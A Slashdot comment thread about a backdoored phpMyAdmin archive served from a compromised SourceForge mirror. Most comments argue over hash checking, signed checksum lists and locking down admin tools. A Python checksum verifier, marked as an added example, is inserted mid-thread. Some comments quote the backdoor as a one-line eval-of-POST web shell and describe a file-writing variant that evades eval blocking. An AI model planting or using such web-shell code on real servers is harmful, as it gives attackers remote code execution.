
Malicious PhpMyAdmin Served From SourceForge Mirror

Unknown Lamer posted more than 2 years ago | from the tin-foil-hat-activate dept.

PHP 86

An anonymous reader writes with a bit of news about the compromised download of phpMyAdmin discovered on an sf.net mirror yesterday: "A malicious version of the open source Web-based MySQL database administration tool phpMyAdmin has been discovered on one of the official mirror sites of SourceForge, the popular online code repository for free and open source software. The file — phpMyAdmin-3.5.2.2-all-languages.zip — was modified to include a backdoor that allowed attackers to remotely execute PHP code on the server running the malicious version of phpMyAdmin." The Sourceforge weblog has details. Someone compromised a mirror (since removed from rotation of course) around September 22nd. Luckily, only around 400 people grabbed the file before someone caught it.


True open sores experience (2, Insightful)

Jkala (2739767) | more than 2 years ago | (#41464063)

They should have md5'd files after downloading.

Re:True open sores experience (4, Informative)

lindi (634828) | more than 2 years ago | (#41464229)

How would you know which md5 hash was correct? They are listed in http://www.phpmyadmin.net/home_page/downloads.php [phpmyadmin.net] which is also hosted by sourceforge.

Re:True open sores experience (2)

X0563511 (793323) | more than 2 years ago | (#41464323)

The mirrors are third-party and not under direct control of SF. I know, when I was working a datacenter one of our customers ran a mirror for them.

Re:True open sores experience (4, Informative)

petermgreen (876956) | more than 2 years ago | (#41464373)

If sourceforge is totally compromised you are right but still the chances of that happening are almost certainly lower than the chances of a random download mirror being compromised, so checking md5s is still a good idea.

Re:True open sores experience (5, Informative)

vlm (69642) | more than 2 years ago | (#41464817)

How would you know which md5 hash was correct?

We could reinvent the wheel, but (as usual) the Debian wizards figured it all out years ago, in this case, they solved the problem in 2003.

You make a big list of valid hashes, GPG sign the list with a well known key that is changed every couple years or so (for a good time see Debian package named debian-keyring), and publish it.

For a good time on a Debian box go to /var/lib/apt/lists and look at a packages file. Assuming you're using wheezy/amd64 the system won't let you install the latest 0ad package (wtf that package is) version 0r11863-2 unless the md5 hash of that package is some big ole number ending in 79eb. Also sha1 and sha256 hashes.

For a good time see

http://wiki.debian.org/SecureApt [debian.org]

I can hand you a questionable looking flash drive with debian packages on it and if the multiple signed hashes match Debian's official gpg signed hash list you can trust my binaries... I can't inject something extra without Fing up at least one of the three hashes.

Or, just go ahead and reinvent the wheel... that's a Security Best Practices that never leads to problems, rock on with your NIH self man!

Re:True open sores experience (1)

lindi (634828) | more than 2 years ago | (#41465427)

I'm well aware of that technology but I don't see how it is relevant here. I doubt you can convince the phpmyadmin developers to require the use of apt for downloading new releases of their software.

Re:True open sores experience (1)

TheLink (130905) | more than 2 years ago | (#41465759)

You're not that aware of the technology or it would be obvious to you what he meant by: "You make a big list of valid hashes, GPG sign the list..."

You do it this way:
http://www.djangoproject.com/m/pgp/Django-1.2.7.checksum.txt [djangoproject.com]

The stuff between: -----BEGIN PGP SIGNED MESSAGE-----
and:-----BEGIN PGP SIGNATURE-----

are signed by the corresponding signature.

more examples: http://distfiles.gentoo.org/releases/amd64/current-iso/stage3-amd64-20120621.tar.bz2.DIGESTS.asc [gentoo.org]
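The signed-hash-list scheme vlm and TheLink describe above (a clearsigned checksum file, verified against a key obtained out of band, then the download's hash compared to the list), as an added example that is not part of this thread. The archive bytes, file names and checksum file are constructed; the PGP signature block is a placeholder, so only the parsing and digest checks run offline, and the gpg call is shown for the real step:

```python
import hashlib
import re
import subprocess

# Digest algorithms recognised by hex length. MD5 is parsed but, following the
# thread's advice, never accepted as the only evidence that a file is genuine.
ALGOS_BY_HEXLEN = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}
ACCEPTED_ALGOS = {"sha256", "sha512"}

BEGIN_SIGNED = "-----BEGIN PGP SIGNED MESSAGE-----"
BEGIN_SIG = "-----BEGIN PGP SIGNATURE-----"
DIGEST_LINE = re.compile(r"^([0-9a-fA-F]{32,128})\s+\*?(\S+)$")


def signed_body(clearsigned_text):
    """Return the lines between the SIGNED MESSAGE header and the SIGNATURE
    block, i.e. exactly the text the PGP signature covers."""
    lines = clearsigned_text.splitlines()
    try:
        start = lines.index(BEGIN_SIGNED)
        end = lines.index(BEGIN_SIG, start)
    except ValueError:
        raise ValueError("not a clearsigned message")
    body = lines[start + 1:end]
    # Skip the armor headers (e.g. "Hash: SHA256") up to the first blank line.
    if "" in body:
        body = body[body.index("") + 1:]
    # RFC 4880 dash-escaping: body lines that began with "-" were prefixed "- ".
    return [l[2:] if l.startswith("- ") else l for l in body]


def parse_digests(body_lines):
    """Map filename -> {algo: hexdigest} from lines of the form '<hex>  <file>'."""
    digests = {}
    for line in body_lines:
        m = DIGEST_LINE.match(line.strip())
        if not m:
            continue  # headings such as "MD5:" or "# SHA256 HASH" are ignored
        hexdigest, filename = m.group(1).lower(), m.group(2)
        algo = ALGOS_BY_HEXLEN.get(len(hexdigest))
        if algo:
            digests.setdefault(filename, {})[algo] = hexdigest
    return digests


def check_download(data, filename, digests):
    """True only if the signed list has at least one accepted (SHA-2) digest
    for the file and every listed digest for it matches the downloaded bytes."""
    listed = digests.get(filename)
    if not listed or not (set(listed) & ACCEPTED_ALGOS):
        return False
    return all(hashlib.new(algo, data).hexdigest() == expected
               for algo, expected in listed.items())


def verify_signature(checksum_path, keyring_path):
    """The step that must come first in practice: let gpg check the clearsigned
    list against a keyring obtained out of band (not from the mirror).
    Requires the gpg binary, so it is not exercised by the offline checks."""
    result = subprocess.run(
        ["gpg", "--no-default-keyring", "--keyring", keyring_path,
         "--verify", checksum_path],
        capture_output=True)
    return result.returncode == 0


# Constructed sample data: a fake release archive, a copy a bad mirror altered,
# and a checksum list in the layout of the Django/Gentoo files linked above.
GOOD_ARCHIVE = b"PK\x03\x04 constructed release archive payload\n"
TAMPERED_ARCHIVE = GOOD_ARCHIVE + b"extra bytes appended by a bad mirror\n"
RELEASE = "example-1.0-all-languages.zip"

SAMPLE_CHECKSUM_FILE = "\n".join([
    BEGIN_SIGNED,
    "Hash: SHA256",
    "",
    "Checksums for the constructed example release",
    "- -- dash-escaped line, restored by signed_body()",
    "",
    "MD5:",
    hashlib.md5(GOOD_ARCHIVE).hexdigest() + "  " + RELEASE,
    hashlib.md5(b"legacy").hexdigest() + "  old-release.zip",
    "",
    "SHA256:",
    hashlib.sha256(GOOD_ARCHIVE).hexdigest() + "  " + RELEASE,
    BEGIN_SIG,
    "PLACEHOLDER-SIGNATURE-NOT-VALID",
    "-----END PGP SIGNATURE-----",
])

if __name__ == "__main__":
    table = parse_digests(signed_body(SAMPLE_CHECKSUM_FILE))
    print("genuine archive accepted:", check_download(GOOD_ARCHIVE, RELEASE, table))
    print("tampered archive accepted:", check_download(TAMPERED_ARCHIVE, RELEASE, table))
    print("MD5-only entry accepted:", check_download(b"legacy", "old-release.zip", table))
```

The hash list is only worth checking after verify_signature() has passed; a list fetched from the same mirror as the file, unsigned, proves nothing.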

Re:True open sores experience (1)

Agent ME (1411269) | more than 2 years ago | (#41470529)

You don't have to use APT just to sign a simple text file list of hashes.

Re:True open sores experience (1)

Firehed (942385) | more than 2 years ago | (#41470769)

Well, you either use the signed (secure) distribution method and guarantee that you got what you asked for, or you don't. If they don't want to distribute it in such a way that their signature can be verified, that's their business - but that means this kind of thing can happen.

Not that it would likely matter. Their lack of support for signed code means they probably would leak their private key, thus negating any gains it would otherwise bring (and then some, as you have misplaced trust rather than no trust at all)

Re:True open sores experience (0)

Anonymous Coward | more than 2 years ago | (#41465795)

You make a big list of valid hashes, GPG sign the list with a well known key that is changed every couple years or so (for a good time see Debian package named debian-keyring), and publish it.

Or even better, just sign the damn package.
Either way don't use MD5, it's so broken as to be useless for security purposes. SHA-1 or SHA-256 are fine, the latter is preferred for new applications.

Re:True open sores experience (0)

Anonymous Coward | more than 2 years ago | (#41466193)

0ad is a free game, I think that's what the package name refers to:

http://www.wildfiregames.com/0ad/

Re:True open sores experience (1)

MaerD (954222) | more than 2 years ago | (#41466845)

I got it, I got it, I got it!
I got your number on the wall!
I got it, I got it, I got it!
For a good time, for a good time call....

Jenny, don't change your number.
I need to make you mine.
Jenny. I'll call your number,
  812a11b49b1a1cce5dd9a0018899501e
  812a11b49b1a1cce5dd9a0018899501e

Maybe not as catchy as 867-5309?

Re:True open sores experience (0)

Anonymous Coward | more than 2 years ago | (#41466953)

0AD is an awesome free historical 3rd person pov game

Get file and MD5 from separate sources (1)

perpenso (1613749) | more than 2 years ago | (#41465913)

How would you know which md5 hash was correct?

OK, maybe I'm paranoid, but I usually get the download file and the MD5 from separate sources. Ideally the MD5 is from the home site of the project rather than one of its mirrors.

Re:True open sores experience (1)

helix2301 (1105613) | more than 2 years ago | (#41466731)

They did not compromise source forge themselves they compromised one of the mirror sites.

Re:True open sores experience (0)

Anonymous Coward | more than 2 years ago | (#41466791)

Do you understand the difference between a single mirror somewhere out there and the entire system and main hosting servers?

Go away you retarded person...

Re:True open sores experience (0)

Intrepid imaginaut (1970940) | more than 2 years ago | (#41464355)

And had this been a Microsoft experience, millions of people would probably have downloaded it and never been informed when it was patched six months later - if it had been caught at all. I mean where did you think all those botnets are coming from?

Re:True open sores experience (0)

Anonymous Coward | more than 2 years ago | (#41464461)

Wasn't that the true MS experience back when they shipped those CIH infected floppies?

Re:True open sores experience (1)

Bill, Shooter of Bul (629286) | more than 2 years ago | (#41477011)

They were downloading PhpMyAdmin, they're not the most tech savvy of users...

Truly! I am shocked! (1)

For a Free Internet (1594621) | more than 2 years ago | (#41464093)

This was probably the work of Joel the evil computer destroyer he is such a loser, and he has no frenids. Always ordering dominoes pizzas, what a sick fatass loser.

Re:Truly! I am shocked! (1, Funny)

X0563511 (793323) | more than 2 years ago | (#41464343)

I don't have any frenids either.

What's a frenid again?

Re:Truly! I am shocked! (1)

jones_supa (887896) | more than 2 years ago | (#41465879)

The parent has a point. It should be made clear that people destroying other people's data actually are sick fatass losers.

What's the problem? (0, Funny)

Anonymous Coward | more than 2 years ago | (#41464115)

It's open source so I'm sure all the users did a code review and found the problem. This is why open source is more secure and less buggy than closed source software.

Re:What's the problem? (2, Informative)

Anonymous Coward | more than 2 years ago | (#41464143)

No, but if any of them md5'd it they would have caught it. And in way less time than doing a code review!

Re:What's the problem? (1)

Sir_Sri (199544) | more than 2 years ago | (#41464931)

And how many people actually do that? Presumably one of the 400 who downloaded it did, figured out who to alert and that's why we know.

But that's a very very small percentage.

This is likely a UI problem, doing an MD5 is easy enough, it's a matter of browsers showing them automatically and keeping the 'official' md5 page around while the download is finishing. None of this is hard, but the vast majority of users don't.

Re:What's the problem? (0)

Anonymous Coward | more than 2 years ago | (#41465233)

It is a UI problem. On Linux you generally have to open a terminal to verify a hash, and on Windows there's just no built in facility.

Re:What's the problem? (0)

Anonymous Coward | more than 2 years ago | (#41465993)

On Linux you generally have to open a terminal to verify a hash, and on Windows there's just no built in facility.

By "no built in facility" you mean the Windows user has to install a md5 utility before they open the Windows terminal and type in the command pretty much like the Linux user does?

Re:What's the problem? (0)

Anonymous Coward | more than 2 years ago | (#41466395)

Windows user has to install HashTab and get a convenient property tab with crc, md5 and sha1. Pretty sure there was something like that for Linux too, but md5sum usually comes as one of the preinstalled packages.

Re:What's the problem? (0)

Anonymous Coward | more than 2 years ago | (#41467309)

No, I meant what I wrote, not what you thought I meant even though I gave absolutely no indication of it in my post. Built-in meaning that 99% of distros you will use have a bunch of CRCs and SHAs in your PATH straight from the install. Windows will require you to find the program online, copy the file to some random folder and add it to your path. Most Windows users have no idea how to do this.

Re:What's the problem? (1)

Dishevel (1105119) | more than 2 years ago | (#41466025)

On Linux you generally have to open a terminal to verify a hash

Generally I use one of the terminal windows I already have open.

Re:What's the problem? (1)

perpenso (1613749) | more than 2 years ago | (#41465947)

No, but if any of them md5'd it they would have caught it.

Assuming they didn't get the MD5 from the same site.

Re:What's the problem? (0)

Anonymous Coward | more than 2 years ago | (#41466107)

MD5 doesn't come from the same server. MD5 is hosted on sourceforge. The malicious package was hosted on one of their many mirrors. The server the package came from and the server on which the MD5 is hosted are entirely different. The only way that what you're saying would be applicable is if sourceforge itself was breached, which is not what happened here.

Re:What's the problem? (0)

Anonymous Coward | more than 2 years ago | (#41473813)

MD5 doesn't come from the same server. MD5 is hosted on sourceforge. The malicious package was hosted on one of their many mirrors. The server the package came from and the server on which the MD5 is hosted are entirely different. The only way that what you're saying would be applicable is if sourceforge itself was breached, which is not what happened here.

It depends on the site. There are plenty of FOSS projects that have a MD5.txt or similar file on the same server.

Re:What's the problem? (1)

Anonymous Coward | more than 2 years ago | (#41464333)

Your point being? The problem was found within days. Compare that to what things would have looked like, had it been closed source. It's highly unlikely the backdoor would've been detected any sooner then.

Re:What's the problem? (-1)

Anonymous Coward | more than 2 years ago | (#41464429)

The companies already know about the back doors in their own closed-source software. They put it there specifically for the NSA.

Re:What's the problem? (1)

gmuslera (3436) | more than 2 years ago | (#41465001)

In fact, some backdoors keep being there for years until, well, it went open source, as happened with Interbase [securityfocus.com] . And it was just the initiative of a single programmer, not company policy or government agencies' requirement.

"weblog"? (5, Funny)

i kan reed (749298) | more than 2 years ago | (#41464179)

Is this 1998? Was the malicious file found on the world wide web?

Re:"weblog"? (4, Insightful)

Anonymous Coward | more than 2 years ago | (#41464811)

What's wrong with that? It's a vastly better word than blog.

Re:"weblog"? (2)

i kan reed (749298) | more than 2 years ago | (#41466355)

I know just how you feel, I make calls with my cellular telephone all the time. Words should never be abbreviated at all.

Re:"weblog"? (1)

hazah (807503) | more than 2 years ago | (#41466437)

Except that one of these words is ubiquitous and the other is not. Definitions of words follow from their use, not the other way around.

Sourceforge problems.. (3, Informative)

undulato (2146486) | more than 2 years ago | (#41464293)

I think someone's head is in the clouds at the moment what with the recent buyout of sourceforge, slashdot et al [engadget.com] . I'm with a big ol' (12 year) open source project on Sourceforge and it's going through the migration procedure currently to the new Sourceforge look and feel - lots of problems, lots of broken stuff, unhappy admins and developers and slow response to tickets.

There are plenty of alternatives out here now for the open source types to host their code. It might be time to start thinking about exit strategies..

Did you use open source code (0, Insightful)

Anonymous Coward | more than 2 years ago | (#41464311)

to save time and the virus was hidden in it?

Re:Did you use open source code (2)

hazah (807503) | more than 2 years ago | (#41464469)

Is this a really shitty attempt at a troll?

Re:Did you use open source code (0)

Anonymous Coward | more than 2 years ago | (#41464521)

www.youtube.com/watch?v=AiVnMazRIII

Re:Did you use open source code (1)

hazah (807503) | more than 2 years ago | (#41466451)

I'll take that as a 'yes'.

Re:Did you use open source code (-1)

Anonymous Coward | more than 2 years ago | (#41468533)

Someone's butthurt for no discernible reason.

Re:Did you use open source code (1)

hazah (807503) | more than 2 years ago | (#41476147)

I hope you'll make it.

Duh. (4, Insightful)

Tyler Eaves (344284) | more than 2 years ago | (#41464349)

Anyone who understands how security works would consider phpMyAdmin's very existence on a server to be a security hole.

Local GUI client + ssh tunnel ftw.

Re:Duh. (4, Informative)

xombo (628858) | more than 2 years ago | (#41464479)

My experience, exactly. I can't tell you how many times I've been asked to look into a problem with a web server only to find that their logs are packed with failed login attempts pointed at /phpmyadmin. It's bad enough that it blindly installs itself as a subdirectory in every Apache vhost you run; but their lack of default password attempt limits and bans (especially given its popularity and the level of access it provides) is downright irresponsible.
There are literally botnets that do nothing more than cruise around the internet looking for phpmyadmin installations.

Re:Duh. (1)

Anonymous Coward | more than 2 years ago | (#41464827)

Please propose a way to block hacking attempts coming from the same person, spread over multiple IPs which are not in the same range and are on a stateless protocol.
No you may not add rules to the firewall since your tool (phpmyadmin) has to handle that.

Re:Duh. (1)

gregarican (694358) | more than 2 years ago | (#41464945)

Why would any web admin tool have open access from any public IP in the first place? I know that the way I handle things for what I host here I limit access to certain narrow IP subnets that cover where the regular admin users would be coming from. Then if someone cannot access the tool because they are temporarily coming in from a different IP range then I can add that on the fly. You figure that, combined with some mechanism for temporarily disabling login access after a set number of failed attempts in a set period of time, makes things at least a little more secure.

This is all outside of the PHP arena that I'm talking about, but the concepts should be similar, no?

Re:Duh. (1)

Anonymous Coward | more than 2 years ago | (#41467275)

Require login credentials input twice. Spit out a failure on the first attempt.

Re:Duh. (0)

Anonymous Coward | about 2 years ago | (#41533857)

Totally agree. We run a Java server, but see log entries every day of hacking attempts/probes, the vast majority trying to access phpmyadmin.

Re:Duh. (5, Funny)

Zenin (266666) | more than 2 years ago | (#41464953)

Anyone who understands how security works would consider php's very existence on a server to be a security hole.

There, I fixed it for you. You're welcome.

Re:Duh. (0)

hazah (807503) | more than 2 years ago | (#41466499)

And you've added absolutely nothing of value. We've heard your opinions. We've considered them. We found them to be irrelevant and useless. We prefer you direct your noise hole elsewhere.

Re:Duh. (1)

Safety Cap (253500) | more than 2 years ago | (#41470577)

We prefer you direct your noise hole elsewhere.

Oh dear. Just relax and let the butthurt flow through you [photobucket.com] .

Re:Duh. well (1)

Safety Cap (253500) | more than 2 years ago | (#41470369)

Anyone who understands how security works would consider php's very existence on a server to be a security hole.

There, I fixed it for you. You're welcome.

Not so much PHP (although every function is broken in some way), but the fact that any n00b can pick it up and start "programming." Without a harsh feedback loop, poor coding practices become calcified and lead to the massive security holes you've observed.

The beauty and curse of PHP is that its default fail state is to act as if nothing bad happened. This keeps unskilled, sloppy n00bs from getting so discouraged with the "NO YOU CAN'T FARKING ASSUME null AND false ARE THE SAME THING, DUMMY!" error messages that they find Something Else To Do like become Energy Meter Readers or Sportscasters or Tiger Food [google.com] .

That is why PHP sucks.

Re:Duh. (1)

gmuslera (3436) | more than 2 years ago | (#41465069)

In fact some years ago the web servers' logs were clogged by bots searching for installations of phpmyadmin, as something usually deployed and exploitable. If it has to be installed (and access can't be restricted using ssh tunnel/vpn/specific ip to mysql), at least it should not be in a default directory name, and should have a password protecting the directory access.

Re:Duh. (1)

MrLizardo (264289) | more than 2 years ago | (#41471581)

I do something a bit different. I tend to put any admin tools up in an /admin directory (ex, https://example.com/admin/phpmyadmin [example.com] ), then use HTTP basic authentication to require users to authenticate with a username/password in our LDAP directory (but you could use local shell accounts as well). That way someone would need to first compromise a user account before they could even *start* trying to compromise one of the admin tools. I tend to think of it as a similar idea to not allowing remote root logins in ssh. Login first and sudo/su. I'm actually surprised that this isn't used more often. Am I missing an obvious security implication? Or is it just a case of people being lazy?

hate phpMyAdmin (1)

Anonymous Coward | more than 2 years ago | (#41464497)

I used to work in a Managed Hosting department, and customers would insist on having this piece of crap on the server. I hated it because there was always some vuln version that they ABSOLUTELY had to have. Finally a new exploit came out for a current version (at the time), and we had two compromises... Then we banned it across the entire customer base. There are too many alternatives to use this piece of garbage. However I suggest insisting your users run something on their local client side and not on your server... eg: heidisql, sequel pro, etc. So it doesn't surprise me at all that this occurred. LEARN YOUR LESSON ALREADY PEOPLE!

Re:hate phpMyAdmin (0)

Anonymous Coward | more than 2 years ago | (#41464539)

You think you've got it bad providing hosting? I have to interview people whose only exposure to SQL is via this garbage.

Re:hate phpMyAdmin (1)

Anonymous Coward | more than 2 years ago | (#41464619)

insisting your users run something on their local client side and not on your server

Doesn't this involve allowing MySQL to accept connections from places other than localhost?

I think I'll stick to PuTTY + Postgres command line.

Re:hate phpMyAdmin (0)

derfy (172944) | more than 2 years ago | (#41464867)

Not if you set up PuTTY to tunnel the remote machine's mysql port to a local port and using a GUI (or command line, if you like)

Which is the scary part? (5, Insightful)

Michalson (638911) | more than 2 years ago | (#41464589)

A widely used web package has a backdoor inserted.

Scary.

One of the regional mirrors of the largest software repository containing tens of thousands of projects is either hacked or was a plant from the start.

Scarier.

The backdoor code [arstechnica.com] looks to be the work of someone who learned PHP on Monday.

Scariest.

Honestly, the only way it could have been more obvious is if the file was called backdoor.php. There was no attempt made to disguise the location or what the code was doing which is why it got caught so quickly. A complete amateur got caught with control over a chunk of Sourceforge downloads. In computer security when you find a breach you don't just close the obvious point of entry, you have to take a big step back and seriously ask 'what else was compromised'. In this case the big question is who else.

If this clown could do it and didn't get caught until an end user saw the stupidly obvious file and its stupidly obvious code (as opposed to a server log or other Sourceforge audit turning it up), what are the competent hackers up to? Real backdoors are blended into the existing code instead of being added as a separate file. Real backdoors are designed to be hidden from casual inspection instead of being completely obvious in their function and 'I don't belong here' status. Really good backdoors are designed to not look like intentionally malicious code even after they are found (ex. the wait4 backdoor attempt in the Linux kernel was pretty good, it got caught because the CVS hack used to insert it in a regional CVS mirror was flawed in several ways that raised alarms).

So, what kind of security/procedure/audit could have been in place, needs to be in place, so that something like this will raise an alarm even when the hacker isn't the most incompetent backdoor author in history? What kind of audit is needed to be sure it hasn't already happened?

Re:Which is the scary part? (1)

gregarican (694358) | more than 2 years ago | (#41464805)

My biggest concern as someone who has a SF project out there (albeit decrepit), is what auditing/security measures does SF employ to screen their mirroring hosts? You'd think that there would at least be some high-level auditing performed to ensure that all of the open source code is somewhat secure...

Re:Which is the scary part? (0)

Anonymous Coward | more than 2 years ago | (#41465279)

No, you wouldn't think that. You'd think that the project in question would probably post cryptographic hashes of their files on a different site than SourceForge so that the mirror files could be verified to be trusted.

Re:Which is the scary part? (1)

ItsJustAPseudonym (1259172) | more than 2 years ago | (#41468013)

That's a good comment. Why post as AC?

Re:Which is the scary part? (0)

Anonymous Coward | more than 2 years ago | (#41485469)

Because otherwise I'd need to press log in.

Re:Which is the scary part? (0)

Anonymous Coward | more than 2 years ago | (#41465403)

The backdoor code looks to be the work of someone who learned PHP on Monday.

No, all PHP naturally looks like that.

Re:Which is the scary part? (1)

hazah (807503) | more than 2 years ago | (#41466545)

And I'm sure you're qualified to make that assertion. /sarcasm

Re:Which is the scary part? (0)

Anonymous Coward | more than 2 years ago | (#41470345)

I've spent more than enough time running shared hosting platforms, thanks for asking. By the way, you need to replace your literal < and > characters with the appropriate HTML entities if you want them to show up on Slashdot, but I'm sure you knew that, being a PHP genius and all.

Re:Which is the scary part? (1)

hazah (807503) | more than 2 years ago | (#41476215)

I had typed out neither &gt; nor &lt;. I only typed the slash. It seemed sufficient and no literal > or < were harmed in the process of writing the post. Not sure what this has to do with being a "PHP genius" (Is that like one of 'em "Mapple Genius"?). As per your supposed experience, so far it's just smoke and mirrors.

Re:Which is the scary part? (0)

Anonymous Coward | more than 2 years ago | (#41488809)

Or maybe he didn't want to type the tag part of a non-tag... how butthurt are you to fall back on something this stupid as your defense?

Re:Which is the scary part? (1)

ibennetch (521581) | more than 2 years ago | (#41465683)

You're close, except:

A widely used web package has a backdoor inserted.

is mostly incorrect, it wasn't the phpMyAdmin project, it wasn't that the source code was compromised; the problem is that one specific mirror was compromised and a modified copy of the phpMyAdmin source was distributed instead of the official files. It's a stretch to blame that on the phpMyAdmin project.

So, what kind of security/procedure/audit could have been in place, needs to be in place, so that something like this will raise an alarm even when the hacker isn't the most incompetent backdoor author in history? What kind of audit is needed to be sure it hasn't already happened?

I'm thinking of some sort of mathematical function where you plug in an arbitrary number of bits, say an entire file, and get out a small representation that is very, very difficult to duplicate. We could call it a hash, I suppose. Then you post the hash to the main web page for each file you distribute, and when someone downloads a file, then compare the hash of the downloaded file to the hash on the web site. Since the mirrors only host the downloads, and not the website, a compromised mirror wouldn't be able to change the website's hash. I need to find a patent attorney, I could make millions on this idea!

(please note that paragraph probably sounds more snarky than it was intended)

Now the ethical question remaining (0)

Anonymous Coward | more than 2 years ago | (#41464615)

of course is, should they use the backdoor to warn the users?

how far? (3)

WGFCrafty (1062506) | more than 2 years ago | (#41464697)

I have used phpmyadmin while learning about servers/web hosting (on my only computer to experiment) and while dealing with the Gallery php software on a more recently hosted site (not on my computer), so I have a general idea of what it does and how to use it (as basic as it gets like backing up DBs).

My question is when the backdoor gives full access to the hacker, what is the extent of compromise? Does it give you all data but you cannot read the passwords ? Do you have the ability to decrypt passwords by gaining root access with this or is the data still protected?

Forgive my ignorance

Re: how far? (0)

Anonymous Coward | more than 2 years ago | (#41464933)

It's a single line script that reads "eval($_POST['somevar'])", so it can do everything possible with permissions granted to web server.

Poke around /var/www, drop a phishing page, probe for local vulnerabilities and exploit them, ...

Strange choice (1)

nedlohs (1335013) | more than 2 years ago | (#41465163)

Does anyone put a phpmyadmin open to the world? Not just passworded but on a port that is firewalled off from all but a set of trusted ips???

I guess it has PHP in the name so probably some idiots do.

Re:Strange choice (0)

Anonymous Coward | more than 2 years ago | (#41469647)

If by some idiots you mean "most shared webhosting services" then sure, "some idiots" do that. The only problem is that there is a significant number of idiots running things...

Hardened PHP -- Suhosin (1)

magic maverick (2615475) | more than 2 years ago | (#41465697)

The backdoor was basically an eval that ran anything posted to it (according to the Ars article posted up thread [arstechnica.com] ). On my web host, Suhosin [hardened-php.net] is enabled by default, and setup to block eval from ever running.

I.e. Even if I had installed this bad version of PhpMyAdmin, I would not have anything to worry about with regard to that eval statement. So, security hey. It's hard, but not that hard.

Re:Hardened PHP -- Suhosin (0)

Anonymous Coward | more than 2 years ago | (#41470873)

It's worth noting that Suhosin is mainly intended to protect you from yourself and from the PHP developers. E.g., eval can be disabled because it is commonly used in poorly written code to evaluate unsanitized user input.

It just so happens that this backdoor used eval for convenience, but they could have inserted any PHP code they wanted - there's no reason they couldn't have made a Suhosin compatible version.

Still, Suhosin is absolutely recommended for anyone running any PHP on their servers. Even if you trust your own code, PHP itself has a pretty spotty security record.

Re:Hardened PHP -- Suhosin (0)

Anonymous Coward | more than 2 years ago | (#41475271)

That's a good barrier (defense in depth and all), but it would've been easily circumvented in this case

instead of the current one liner
      eval($_POST['somevar']);

he could've used something more akin to
      file_put_contents('localexploitfile.php', $_POST['somevar']);

and then visit http://yourhost/phpmyadmin/localexploitfile.php to execute the code

Mirrors are problematic (1)

jones_supa (887896) | more than 2 years ago | (#41466013)

This is a reason why I generally avoid using mirrors.

Re:Mirrors are problematic (0)

Anonymous Coward | more than 2 years ago | (#41466419)

Or perhaps you're a vampire?

A simpler alternative to phpMyAdmin (1)

ItsJustAPseudonym (1259172) | more than 2 years ago | (#41467849)

As an alternative, one can use phpMiniAdmin [sourceforge.net] . Way smaller, with fewer places to hide malicious code. Also, being less complicated than phpMyAdmin, it is easier to get it running.

Debian had a hole in OpenSSL a while back (0)

Anonymous Coward | more than 2 years ago | (#41497187)

I am surprised that the OpenSSL hole in Debian didn't cause people to leave Debian in droves. That's why I use CentOS on my servers now, not because I like it more than Debian, but because I cannot trust the Debian project allowing incompetent teenagers to work on core system security libraries. This will have to happen more than once for people to question sourceforge over their security practices.
